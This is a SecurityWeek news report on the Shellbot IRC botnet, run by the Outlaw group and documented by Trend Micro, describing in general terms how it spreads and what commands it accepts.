Security Experts:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

Shellbot Botnet Targets Linux, Android Devices

An IRC bot built using Pearl is targeting Internet of Things (IoT) devices and Linux servers, but can also affect Windows systems and Android devices, Trend Micro warns.

An IRC bot built using Pearl is targeting Internet of Things (IoT) devices and Linux servers, but can also affect Windows systems and Android devices, Trend Micro warns.

Dubbed Shellbot, the malware is being distributed by a threat group called Outlaw, which recently compromised FTP servers of a Japanese art institution and a Bangladeshi government site. The hackers linked compromised servers to a high availability cluster to host an IRC bouncer and control the botnet.

Previously, the botnet was being distributed via an exploit targeting the ShellShock vulnerability, hence its name. Last month, IBM observed attacks targeting the Drupalgeddon2 vulnerability (CVE-2018-7600) to distribute the botnet.

The campaign Trend Micro’s security researchers investigated, however, leveraged previously brute-forced or compromised hosts for distribution purposes. The bot was observed targeting Ubuntu and Android devices.

By looking at the botnet’s command and control (C&C) traffic, the security researchers found the IRC channel’s information and discovered around 142 hosts in the channel at the first infection.

To infect hosts, the malware first runs a command on the target, to verify that it accepts commands from the command-line interface (CLI). Next, the working directory is changed to “/tmp” and the downloaded payload is run with Perl interpreter. The payload is removed in the final step.

Once the Shellbot backdoor is up and running on the infected system, the IRC channel’s administrator can send commands to the host, to perform a port scan and various forms of distributed denial of service (DDoS), to download a file, get information about other machines, or send operating system (OS) information and a list of certain running processes.

The security researchers also discovered that the attackers would often modify the contents of the files hosted on the C&C server. The modification, deletion and addition of files mostly happened during daytime in Central European Time/CET, but never at night or on weekends.

The use of an IRC bot isn’t a novel tactic, especially with the code used in these attacks being available online, Trend Micro notes. The operation targeted big companies, but the group hasn’t engaged in widespread attacks, the security researchers also point out.

Related: Hackers Exploit Drupalgeddon2 to Install Backdoor

Related: New Virobot Ransomware and Botnet Emerges

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Expert Insights

Related Content

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

CISA, NSA, and MS-ISAC issued an alert on the malicious use of RMM software to steal money from bank accounts.

Cyberwarfare

Russia-linked cyberespionage group APT29 has been observed using embassy-themed lures and the GraphicalNeutrino malware in recent attacks.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Cybercrime

Chinese threat actor DragonSpark has been using the SparkRAT open source backdoor in attacks targeting East Asian organizations.

Malware & Threats

Security researchers are warning of a new wave of malicious NPM and PyPI packages designed to steal user information and download additional payloads.

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.